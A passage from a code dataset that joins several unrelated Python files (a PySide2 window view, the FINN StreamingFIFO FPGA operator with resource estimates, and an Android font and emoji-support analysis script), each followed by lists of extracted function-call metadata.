| [((42, 7, 42, 28), 'datetime.timedelta', 'datetime.timedelta', ({(42, 26, 42, 27): '0'}, {}), '(0)', False, 'import datetime\n'), ((101, 18, 101, 60), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((43, 15, 43, 52), 'datetime.datetime.utcfromtimestamp', 'datetime.datetime.utcfromtimestamp', ({(43, 50, 43, 51): '0'}, {}), '(0)', False, 'import datetime\n'), ((73, 23, 73, 57), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((103, 22, 103, 63), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((546, 15, 546, 47), 'datetime.datetime', 'datetime.datetime', ({(546, 33, 546, 40): 'dt.year', (546, 42, 546, 43): '1', (546, 45, 546, 46): '1'}, {}), '(dt.year, 1, 1)', False, 'import datetime\n'), ((581, 14, 581, 32), 'dateutil.parser._parsetz', 'parser._parsetz', ({(581, 30, 581, 31): 's'}, {}), '(s)', False, 'from dateutil import parser\n'), ((643, 15, 643, 52), 'dateutil.relativedelta.relativedelta', 'relativedelta.relativedelta', ({}, {}), '(**kwargs)', False, 'from dateutil import relativedelta\n'), ((651, 28, 651, 68), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((652, 26, 652, 64), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((917, 11, 917, 30), 'os.path.isabs', 'os.path.isabs', ({(917, 25, 917, 29): 'name'}, {}), '(name)', False, 'import os\n'), ((152, 15, 152, 54), 'time.localtime', 'time.localtime', ({(152, 30, 152, 53): '(timestamp + time.timezone)'}, {}), '(timestamp + time.timezone)', False, 'import time\n'), ((356, 24, 356, 58), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((489, 15, 489, 45), 'os.path.isfile', 'os.path.isfile', ({(489, 30, 489, 44): 'self._filename'}, {}), '(self._filename)', False, 'import os\n'), ((504, 31, 504, 68), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((508, 31, 508, 68), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((906, 15, 906, 39), 'os.path.isfile', 'os.path.isfile', ({(906, 30, 906, 38): 'filepath'}, {}), '(filepath)', False, 'import os\n'), ((918, 15, 918, 35), 'os.path.isfile', 'os.path.isfile', ({(918, 30, 918, 34): 'name'}, {}), '(name)', False, 'import os\n'), ((610, 36, 610, 76), 'dateutil.relativedelta.weekday', 'relativedelta.weekday', ({(610, 58, 610, 67): 'x.weekday', (610, 69, 610, 75): 'x.week'}, {}), '(x.weekday, x.week)', False, 'from dateutil import relativedelta\n'), ((627, 36, 627, 56), 'dateutil.relativedelta.SU', 'relativedelta.SU', ({(627, 53, 627, 55): '+1'}, {}), '(+1)', False, 'from dateutil import relativedelta\n'), ((631, 36, 631, 56), 'dateutil.relativedelta.SU', 'relativedelta.SU', ({(631, 53, 631, 55): '-1'}, {}), '(-1)', False, 'from dateutil import relativedelta\n'), ((898, 19, 898, 42), 'os.path.isabs', 'os.path.isabs', ({(898, 33, 898, 41): 'filepath'}, {}), '(filepath)', False, 'import os\n'), ((924, 27, 924, 51), 'os.path.join', 'os.path.join', ({(924, 40, 924, 44): 'path', (924, 46, 924, 50): 'name'}, {}), '(path, name)', False, 'import os\n'), ((510, 48, 510, 76), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((515, 54, 515, 74), 'dateutil.relativedelta.SU', 'relativedelta.SU', ({(515, 71, 515, 73): '+1'}, {}), '(+1)', False, 'from dateutil import relativedelta\n'), ((520, 56, 520, 76), 'dateutil.relativedelta.SU', 'relativedelta.SU', ({(520, 73, 520, 75): '-1'}, {}), '(-1)', False, 'from dateutil 
import relativedelta\n'), ((901, 31, 901, 59), 'os.path.join', 'os.path.join', ({(901, 44, 901, 48): 'path', (901, 50, 901, 58): 'filename'}, {}), '(path, filename)', False, 'import os\n'), ((902, 23, 902, 47), 'os.path.isfile', 'os.path.isfile', ({(902, 38, 902, 46): 'filepath'}, {}), '(filepath)', False, 'import os\n'), ((925, 23, 925, 47), 'os.path.isfile', 'os.path.isfile', ({(925, 38, 925, 46): 'filepath'}, {}), '(filepath)', False, 'import os\n'), ((943, 25, 943, 36), 'dateutil.zoneinfo.gettz', 'gettz', ({(943, 31, 943, 35): 'name'}, {}), '(name)', False, 'from dateutil.zoneinfo import gettz\n'), ((927, 27, 927, 51), 'os.path.isfile', 'os.path.isfile', ({(927, 42, 927, 50): 'filepath'}, {}), '(filepath)', False, 'import os\n'), ((938, 29, 938, 40), 'dateutil.tzwin.tzwin', 'tzwin', ({(938, 35, 938, 39): 'name'}, {}), '(name)', False, 'from dateutil.tzwin import tzwin, tzwinlocal\n')] |
suuperhu/Pyside2MVCFramework | example/first_example/window/inputWindow/view.py | c28bd0fbb6b53bb2cdad8d0723b4251fc93319d6 | # -*- coding: utf-8 -*-
"""
# @SoftwareIDE : PyCharm2020Pro
# @ProjectName : PySide2MVCFramework
# @FileName : view.py
# @Author : 胡守杰
# @Email : [email protected]
# @ZhFileDescription :
# @EnFileDescription :
"""
import os
from pyside2mvcframework.core.view import View
from conf.global_settings import BASE_PATH
class InputWindowView(View):
uiFilePath = os.path.join(BASE_PATH, "src\\window\\inputWindow\\inputWindow.ui")
if __name__ == '__main__':
print("unit test from {filename}".format(filename=__file__))
import sys
from PySide2.QtWidgets import QApplication
app = QApplication(sys.argv)
view = InputWindowView().birth()
view.show()
sys.exit(app.exec_())
| [((17, 17, 17, 84), 'os.path.join', 'os.path.join', ({(17, 30, 17, 39): 'BASE_PATH', (17, 41, 17, 83): '"""src\\\\window\\\\inputWindow\\\\inputWindow.ui"""'}, {}), "(BASE_PATH, 'src\\\\window\\\\inputWindow\\\\inputWindow.ui')", False, 'import os\n'), ((25, 10, 25, 32), 'PySide2.QtWidgets.QApplication', 'QApplication', ({(25, 23, 25, 31): 'sys.argv'}, {}), '(sys.argv)', False, 'from PySide2.QtWidgets import QApplication\n')] |
AlexMontgomerie/finn | src/finn/custom_op/fpgadataflow/streamingfifo.py | ec5f67b333ad4db4acf6191c3b5ab5e9067347aa | # Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import numpy as np
from shutil import copy
import subprocess
import math
import warnings
from finn.custom_op.fpgadataflow.hlscustomop import HLSCustomOp
from finn.core.datatype import DataType
from onnx import TensorProto, helper
from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy
from . import templates
class StreamingFIFO(HLSCustomOp):
def __init__(self, onnx_node):
super().__init__(onnx_node)
self.strm_fifo_wrapper = templates.strm_fifo_wrapper
def get_nodeattr_types(self):
my_attrs = {
# FIFO depth
"depth": ("i", True, 0),
# folded shape of input/output
"folded_shape": ("ints", True, []),
# FINN DataTypes for inputs/outputs
"dataType": ("s", True, ""),
# Toggle between hls or IPI implementation
# rtl - use the hls generated IP during stitching
# vivado - use the AXI Infrastructure FIFO
"impl_style": ("s", False, "rtl", {"rtl", "vivado"}),
# FPGA resource type for FIFOs when impl_style is vivado
# auto -- let Vivado decide
# block -- use BRAM
# distributed -- use LUTRAM
# ultra -- use URAM (on UltraScale+)
"ram_style": (
"s",
False,
"auto",
{"auto", "block", "distributed", "ultra"},
),
}
my_attrs.update(super().get_nodeattr_types())
return my_attrs
def make_shape_compatible_op(self, model):
exp_ishape = self.get_normal_input_shape()
oshape = self.get_normal_output_shape()
ishape = tuple(model.get_tensor_shape(self.onnx_node.input[0]))
        assert ishape == tuple(exp_ishape), "Unexpected input shape for StreamingFIFO."
# implement tensor with correct shape
values = np.random.randn(*oshape).astype(np.float32)
return helper.make_node(
"Constant",
inputs=[],
outputs=[self.onnx_node.output[0]],
value=helper.make_tensor(
name="const_tensor",
data_type=TensorProto.FLOAT,
dims=values.shape,
vals=values.flatten().astype(float),
),
)
def infer_node_datatype(self, model):
node = self.onnx_node
idt = model.get_tensor_datatype(node.input[0])
if idt != self.get_input_datatype():
warn_str = "inputDataType changing for %s: %s -> %s " % (
node.name,
str(self.get_input_datatype()),
str(idt),
)
warnings.warn(warn_str)
self.set_nodeattr("dataType", idt.name)
# data type stays the same
model.set_tensor_datatype(node.output[0], idt)
def verify_node(self):
pass
def get_verilog_top_module_name(self):
"Return the Verilog top module name for this node."
node = self.onnx_node
prefixed_top_name = "%s" % (node.name)
return prefixed_top_name
def code_generation_ipgen(self, model, fpgapart, clk):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
os.makedirs(verilog_dir)
# copy Q_srl.v from finn-rtllib to verilog directory
memstream_dir = "/workspace/finn/finn-rtllib/memstream/hdl/"
Q_file = os.path.join(memstream_dir, "Q_srl.v")
copy(Q_file, verilog_dir)
# empty code gen dictionary for new entries
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
self.code_gen_dict["$LAYER_NAME$"] = [
"{}_{}".format(self.onnx_node.name, self.onnx_node.name)
]
# make instream width a multiple of 8 for axi interface
in_width = self.get_instream_width_padded()
count_width = int(self.get_nodeattr("depth") - 1).bit_length()
self.code_gen_dict["$COUNT_RANGE$"] = ["[{}:0]".format(count_width - 1)]
self.code_gen_dict["$IN_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$OUT_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$WIDTH$"] = [str(in_width)]
self.code_gen_dict["$DEPTH$"] = [str(self.get_nodeattr("depth"))]
template = self.strm_fifo_wrapper
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "{}.v".format(self.onnx_node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def ipgen_singlenode_code(self):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
# prepare the IP packaging tcl template
template = templates.ip_package_tcl
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
# note: setting the root dir as absolute can cause path problems
# the ipgen script will be invoked from the sources dir so root_dir=. is OK
self.code_gen_dict["$VERILOG_DIR$"] = ["."]
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "package_ip.tcl"), "w")
f.write(template)
f.close()
# create a shell script and call Vivado to invoke the IP pkg script
make_project_sh = verilog_dir + "/make_ip.sh"
working_dir = os.environ["PWD"]
with open(make_project_sh, "w") as f:
f.write("#!/bin/bash \n")
f.write("cd {}\n".format(verilog_dir))
f.write("vivado -mode batch -source package_ip.tcl\n")
f.write("cd {}\n".format(working_dir))
bash_command = ["bash", make_project_sh]
process_compile = subprocess.Popen(bash_command, stdout=subprocess.PIPE)
process_compile.communicate()
# set ipgen_path and ip_path to point to the new packaged IP
self.set_nodeattr("ipgen_path", verilog_dir)
self.set_nodeattr("ip_path", verilog_dir)
vlnv = "xilinx.com:hls:%s:1.0" % (self.onnx_node.name)
self.set_nodeattr("ip_vlnv", vlnv)
self.code_gen_dict.clear()
def get_normal_input_shape(self):
depth = self.get_nodeattr("depth")
# depth has to be between 2 and 256 with the current
# StreamingFIFO implementation
assert depth >= 2, """Depth is too low"""
if depth > 256 and self.get_nodeattr("impl_style") == "rtl":
warnings.warn(
"Depth is high, set between 2 and 256 for efficient SRL implementation"
)
# derive normal shape from folded shape
# StreamingFIFOs are inserted in between fpgadataflow nodes
# the folded shape could be for example (1, nf, pe)
# with nf (neuron folding): mh // pe
# the normal input shape is in this case (1, mh)
# so to achieve this the two inner dimensions are multiplied
# and together with all previous dimensions
# this gives the normal input shape
folded_shape = self.get_nodeattr("folded_shape")
# extract inner dimension
inner_dim = folded_shape[-1]
# multiply with the next inner dimension
folding_factor = folded_shape[-2] * inner_dim
normal_ishape = []
# create the normal_ishape
for i in range(len(folded_shape) - 2):
normal_ishape.append(folded_shape[i])
normal_ishape.append(folding_factor)
return normal_ishape
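    # Worked example for get_normal_input_shape (assumed attribute values, for
    # illustration only): with folded_shape = (1, 4, 16) the inner dimension is
    # 16, the folding factor is 4 * 16 = 64, and the derived normal input shape
    # becomes [1, 64].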
def get_normal_output_shape(self):
return self.get_normal_input_shape()
def get_folded_input_shape(self):
return self.get_nodeattr("folded_shape")
def get_folded_output_shape(self):
return self.get_nodeattr("folded_shape")
def get_instream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def get_outstream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def execute_node(self, context, graph):
mode = self.get_nodeattr("exec_mode")
node = self.onnx_node
inp = context[node.input[0]]
exp_shape = self.get_normal_input_shape()
if mode == "cppsim":
output = inp
output = np.asarray([output], dtype=np.float32).reshape(*exp_shape)
context[node.output[0]] = output
elif mode == "rtlsim":
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
# create a npy file for the input of the node
assert (
str(inp.dtype) == "float32"
), """Input datatype is
not float32 as expected."""
expected_inp_shape = self.get_folded_input_shape()
reshaped_input = inp.reshape(expected_inp_shape)
if DataType[self.get_nodeattr("dataType")] == DataType.BIPOLAR:
# store bipolar activations as binary
reshaped_input = (reshaped_input + 1) / 2
export_idt = DataType.BINARY
else:
export_idt = DataType[self.get_nodeattr("dataType")]
# make copy before saving the array
reshaped_input = reshaped_input.copy()
np.save(os.path.join(code_gen_dir, "input_0.npy"), reshaped_input)
sim = self.get_rtlsim()
nbits = self.get_instream_width()
inp = npy_to_rtlsim_input(
"{}/input_0.npy".format(code_gen_dir), export_idt, nbits
)
super().reset_rtlsim(sim)
super().toggle_clk(sim)
output = self.rtlsim(sim, inp)
odt = DataType[self.get_nodeattr("dataType")]
target_bits = odt.bitwidth()
packed_bits = self.get_outstream_width()
out_npy_path = "{}/output.npy".format(code_gen_dir)
out_shape = self.get_folded_output_shape()
rtlsim_output_to_npy(
output, out_npy_path, odt, out_shape, packed_bits, target_bits
)
# load and reshape output
output = np.load(out_npy_path)
oshape = self.get_normal_output_shape()
output = np.asarray([output], dtype=np.float32).reshape(*oshape)
context[node.output[0]] = output
else:
raise Exception(
"""Invalid value for attribute exec_mode! Is currently set to: {}
            has to be set to one of the following values ("cppsim", "rtlsim")""".format(
mode
)
)
def get_number_output_values(self):
folded_oshape = self.get_folded_output_shape()
return np.prod(folded_oshape[:-1])
def global_includes(self):
pass
def defines(self, var):
pass
def read_npy_data(self):
pass
def strm_decl(self):
pass
def docompute(self):
pass
def dataoutstrm(self):
pass
def save_as_npy(self):
pass
def blackboxfunction(self):
pass
def pragmas(self):
pass
def code_generation_ipi(self):
impl_style = self.get_nodeattr("impl_style")
if impl_style == "rtl":
return super().code_generation_ipi()
elif impl_style == "vivado":
cmd = []
node_name = self.onnx_node.name
depth = self.get_nodeattr("depth")
ram_style = self.get_nodeattr("ram_style")
# create a hierarchy for this layer, with the same port names
clk_name = self.get_verilog_top_module_intf_names()["clk"][0]
rst_name = self.get_verilog_top_module_intf_names()["rst"][0]
dout_name = self.get_verilog_top_module_intf_names()["m_axis"][0][0]
din_name = self.get_verilog_top_module_intf_names()["s_axis"][0][0]
cmd.append("create_bd_cell -type hier %s" % node_name)
cmd.append("create_bd_pin -dir I -type clk /%s/%s" % (node_name, clk_name))
cmd.append("create_bd_pin -dir I -type rst /%s/%s" % (node_name, rst_name))
cmd.append(
"create_bd_intf_pin -mode Master "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s"
% (node_name, dout_name)
)
cmd.append(
"create_bd_intf_pin -mode Slave "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s" % (node_name, din_name)
)
# instantiate and configure DWC
cmd.append(
"create_bd_cell -type ip "
"-vlnv xilinx.com:ip:axis_data_fifo:2.0 /%s/fifo" % node_name
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_DEPTH {%d}] "
"[get_bd_cells /%s/fifo]" % (depth, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_MEMORY_TYPE {%s}] "
"[get_bd_cells /%s/fifo]" % (ram_style, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.TDATA_NUM_BYTES {%d}] "
"[get_bd_cells /%s/fifo]"
% (np.ceil(self.get_outstream_width() / 8), node_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/M_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, dout_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/S_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, din_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aresetn]"
% (node_name, rst_name, node_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aclk]" % (node_name, clk_name, node_name)
)
return cmd
else:
raise Exception(
"FIFO implementation style %s not supported, please use rtl or vivado"
% impl_style
)
def bram_estimation(self):
"""Calculates resource estimation for BRAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "block"):
# Non-BRAM based implementation
return 0
if W == 1:
return math.ceil(depth / 16384)
elif W == 2:
return math.ceil(depth / 8192)
elif W <= 4:
return (math.ceil(depth / 4096)) * (math.ceil(W / 4))
elif W <= 9:
return (math.ceil(depth / 2048)) * (math.ceil(W / 9))
elif W <= 18 or depth > 512:
return (math.ceil(depth / 1024)) * (math.ceil(W / 18))
else:
return (math.ceil(depth / 512)) * (math.ceil(W / 36))
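    # Worked examples for bram_estimation (assumed impl_style="vivado" and
    # ram_style="block"; illustration only):
    #   W = 32, depth = 256  -> ceil(256/512)  * ceil(32/36) = 1 BRAM
    #   W = 64, depth = 2048 -> ceil(2048/1024) * ceil(64/18) = 2 * 4 = 8 BRAMs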
def uram_estimation(self):
"""Calculates resource estimation for URAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "ultra"):
            # Non-URAM based implementation
return 0
else:
return (math.ceil(depth / 4096)) * (math.ceil(W / 72))
def bram_efficiency_estimation(self):
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
bram16_est = self.bram_estimation()
if bram16_est == 0:
return 1
wbits = W * depth
bram16_est_capacity = bram16_est * 36 * 512
return wbits / bram16_est_capacity
def lut_estimation(self):
"""Calculates resource estimations for LUTs"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
address_luts = 2 * math.ceil(math.log(depth, 2))
if impl == "rtl" or (impl == "vivado" and ram_type == "distributed"):
ram_luts = (math.ceil(depth / 32)) * (math.ceil(W / 2))
else:
ram_luts = 0
return int(address_luts + ram_luts)
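    # Worked example for lut_estimation (assumed ram_style="distributed";
    # illustration only): with depth = 100 and W = 32 the address LUTs are
    # 2 * ceil(log2(100)) = 14 and the RAM LUTs are ceil(100/32) * ceil(32/2)
    # = 4 * 16 = 64, giving 78 LUTs in total.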
def prepare_rtlsim(self):
assert self.get_nodeattr("impl_style") != "vivado", (
"StreamingFIFO impl_style "
"cannot be vivado for rtlsim. Only impl_style=rtl supported."
)
super().prepare_rtlsim()
| [((124, 8, 124, 32), 'os.makedirs', 'os.makedirs', ({(124, 20, 124, 31): 'verilog_dir'}, {}), '(verilog_dir)', False, 'import os\n'), ((127, 17, 127, 55), 'os.path.join', 'os.path.join', ({(127, 30, 127, 43): 'memstream_dir', (127, 45, 127, 54): '"""Q_srl.v"""'}, {}), "(memstream_dir, 'Q_srl.v')", False, 'import os\n'), ((128, 8, 128, 33), 'shutil.copy', 'copy', ({(128, 13, 128, 19): 'Q_file', (128, 21, 128, 32): 'verilog_dir'}, {}), '(Q_file, verilog_dir)', False, 'from shutil import copy\n'), ((184, 26, 184, 80), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((305, 15, 305, 42), 'numpy.prod', 'np.prod', ({(305, 23, 305, 41): 'folded_oshape[:-1]'}, {}), '(folded_oshape[:-1])', True, 'import numpy as np\n'), ((104, 12, 104, 35), 'warnings.warn', 'warnings.warn', ({(104, 26, 104, 34): 'warn_str'}, {}), '(warn_str)', False, 'import warnings\n'), ((172, 17, 172, 60), 'os.path.join', 'os.path.join', ({(172, 30, 172, 41): 'verilog_dir', (172, 43, 172, 59): '"""package_ip.tcl"""'}, {}), "(verilog_dir, 'package_ip.tcl')", False, 'import os\n'), ((199, 12, 201, 13), 'warnings.warn', 'warnings.warn', ({(200, 16, 200, 87): '"""Depth is high, set between 2 and 256 for efficient SRL implementation"""'}, {}), "(\n 'Depth is high, set between 2 and 256 for efficient SRL implementation')", False, 'import warnings\n'), ((414, 19, 414, 43), 'math.ceil', 'math.ceil', ({(414, 29, 414, 42): '(depth / 16384)'}, {}), '(depth / 16384)', False, 'import math\n'), ((82, 17, 82, 41), 'numpy.random.randn', 'np.random.randn', ({(82, 33, 82, 40): '*oshape'}, {}), '(*oshape)', True, 'import numpy as np\n'), ((286, 12, 288, 13), 'finn.util.data_packing.rtlsim_output_to_npy', 'rtlsim_output_to_npy', ({(287, 16, 287, 22): 'output', (287, 24, 287, 36): 'out_npy_path', (287, 38, 287, 41): 'odt', (287, 43, 287, 52): 'out_shape', (287, 54, 287, 65): 'packed_bits', (287, 67, 287, 78): 'target_bits'}, {}), '(output, out_npy_path, odt, out_shape, packed_bits,\n target_bits)', False, 'from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy\n'), ((290, 21, 290, 42), 'numpy.load', 'np.load', ({(290, 29, 290, 41): 'out_npy_path'}, {}), '(out_npy_path)', True, 'import numpy as np\n'), ((416, 19, 416, 42), 'math.ceil', 'math.ceil', ({(416, 29, 416, 41): '(depth / 8192)'}, {}), '(depth / 8192)', False, 'import math\n'), ((438, 20, 438, 43), 'math.ceil', 'math.ceil', ({(438, 30, 438, 42): '(depth / 4096)'}, {}), '(depth / 4096)', False, 'import math\n'), ((438, 48, 438, 65), 'math.ceil', 'math.ceil', ({(438, 58, 438, 64): '(W / 72)'}, {}), '(W / 72)', False, 'import math\n'), ((457, 37, 457, 55), 'math.log', 'math.log', ({(457, 46, 457, 51): 'depth', (457, 53, 457, 54): '(2)'}, {}), '(depth, 2)', False, 'import math\n'), ((460, 24, 460, 45), 'math.ceil', 'math.ceil', ({(460, 34, 460, 44): '(depth / 32)'}, {}), '(depth / 32)', False, 'import math\n'), ((460, 50, 460, 66), 'math.ceil', 'math.ceil', ({(460, 60, 460, 65): '(W / 2)'}, {}), '(W / 2)', False, 'import math\n'), ((253, 21, 253, 59), 'numpy.asarray', 'np.asarray', (), '', True, 'import numpy as np\n'), ((272, 20, 272, 61), 'os.path.join', 'os.path.join', ({(272, 33, 272, 45): 'code_gen_dir', (272, 47, 272, 60): '"""input_0.npy"""'}, {}), "(code_gen_dir, 'input_0.npy')", False, 'import os\n'), ((292, 21, 292, 59), 'numpy.asarray', 'np.asarray', (), '', True, 'import numpy as np\n'), ((418, 20, 418, 43), 'math.ceil', 'math.ceil', ({(418, 30, 418, 42): '(depth / 4096)'}, {}), '(depth / 4096)', False, 'import math\n'), ((418, 48, 
418, 64), 'math.ceil', 'math.ceil', ({(418, 58, 418, 63): '(W / 4)'}, {}), '(W / 4)', False, 'import math\n'), ((420, 20, 420, 43), 'math.ceil', 'math.ceil', ({(420, 30, 420, 42): '(depth / 2048)'}, {}), '(depth / 2048)', False, 'import math\n'), ((420, 48, 420, 64), 'math.ceil', 'math.ceil', ({(420, 58, 420, 63): '(W / 9)'}, {}), '(W / 9)', False, 'import math\n'), ((422, 20, 422, 43), 'math.ceil', 'math.ceil', ({(422, 30, 422, 42): '(depth / 1024)'}, {}), '(depth / 1024)', False, 'import math\n'), ((422, 48, 422, 65), 'math.ceil', 'math.ceil', ({(422, 58, 422, 64): '(W / 18)'}, {}), '(W / 18)', False, 'import math\n'), ((424, 20, 424, 42), 'math.ceil', 'math.ceil', ({(424, 30, 424, 41): '(depth / 512)'}, {}), '(depth / 512)', False, 'import math\n'), ((424, 47, 424, 64), 'math.ceil', 'math.ceil', ({(424, 57, 424, 63): '(W / 36)'}, {}), '(W / 36)', False, 'import math\n')] |
chrissimpkins/android_fonts | android_fonts.py | f904147774836468a8c011b1596f85577220b140 | import ast
import emoji
import os
import pandas as pd
_SUPPORT_CACHE_CSV = emoji.datafile('emoji_support.csv')
_API_LEVELS = {
1: ("(no codename)", "1.0"),
2: ("(no codename)", "1.1"),
3: ("Cupcake", "1.5 "),
4: ("Donut", "1.6 "),
5: ("Eclair", "2.0"),
6: ("Eclair", "2.0.1"),
7: ("Eclair", "2.1 "),
8: ("Froyo", "2.2.x "),
9: ("Gingerbread", "2.3 - 2.3.2 "),
10: ("Gingerbread", "2.3.3 - 2.3.7"),
11: ("Honeycomb", "3.0"),
12: ("Honeycomb", "3.1 "),
13: ("Honeycomb", "3.2.x"),
14: ("Ice Cream Sandwich", "4.0.1 - 4.0.2 "),
15: ("Ice Cream Sandwich", "4.0.3 - 4.0.4 "),
16: ("Jelly Bean", "4.1.x"),
17: ("Jelly Bean", "4.2.x"),
18: ("Jelly Bean", "4.3.x"),
19: ("KitKat", "4.4 - 4.4.4"),
21: ("Lollipop", "5.0"),
22: ("Lollipop", "5.1"),
23: ("Marshmallow", "6.0"),
24: ("Nougat", "7.0"),
25: ("Nougat", "7.1"),
26: ("Oreo", "8.0.0"),
27: ("Oreo", "8.1.0"),
28: ("Pie", "9"),
29: ("Android 10 (Q)", "10"),
30: ("Android 11 (R)", "11"),
31: ("Android 12 (S)", "12"),
}
def api_levels():
return _API_LEVELS
def is_font_file(file):
_, ext = os.path.splitext(file)
return ext.lower() in {'.ttf', '.otf', '.ttc'}
def metadata():
records = []
for root, dirs, files in os.walk('api_level'):
for file in files:
if is_font_file(file):
full_file = os.path.join(root, file)
api_level = int(os.path.basename(root))
size = os.stat(full_file).st_size
records.append((api_level, full_file, size))
df = pd.DataFrame(records)
df.columns = ['api_level', 'font_file', 'file_size']
return df
def emoji_support():
"""Dataframe of [emoji_level, font_file, codepoints, supported].
Includes every sequence we could find of any type.
Requires prior execution of populate_emoji_support.py"""
if not os.path.isfile(_SUPPORT_CACHE_CSV):
raise IOError('Please run populate_emoji_support.py first')
return (pd.read_csv(_SUPPORT_CACHE_CSV, converters={'cp_seq': ast.literal_eval})
.rename(columns={'cp_seq': 'codepoints'}))
def font_summary():
df = metadata()
sf = (df
.groupby(['api_level'])
.agg({'font_file': 'count', 'file_size': 'sum'}))
sf['file_size'] = sf['file_size'].apply(lambda sz: (sz / pow(2, 20)))
sf.rename(columns = {
'font_file': 'num_files',
'file_size': 'size_MB',
}, inplace=True)
sf['delta_size_MB'] = sf['size_MB'] - sf['size_MB'].shift(1)
sf.reset_index(inplace=True)
return sf
def emoji_detail():
df = emoji_support()
# merge emoji metadata to gain the status column
df = df.merge(emoji.metadata().drop(columns=['emoji_level']),
on='codepoints')
df = df[df['status'] == 'fully-qualified']
df = df.drop(columns='status')
df.supported = df.supported.astype('int32')
df['api_level'] = df.font_file.str.split('/').str[1]
df.api_level = df.api_level.astype('int32')
df['font_file'] = df.font_file.str.split('/').str[2]
return df
def emoji_summary():
df = emoji_detail()
sf = (df.groupby(['font_file', 'api_level', 'emoji_level'])
.agg({'supported': ['sum', 'count']}))
sf.columns = ['supported', 'total']
sf.reset_index(inplace=True)
sf2 = (sf.drop(columns='emoji_level')
.groupby('api_level')
.agg('sum')
.reset_index())
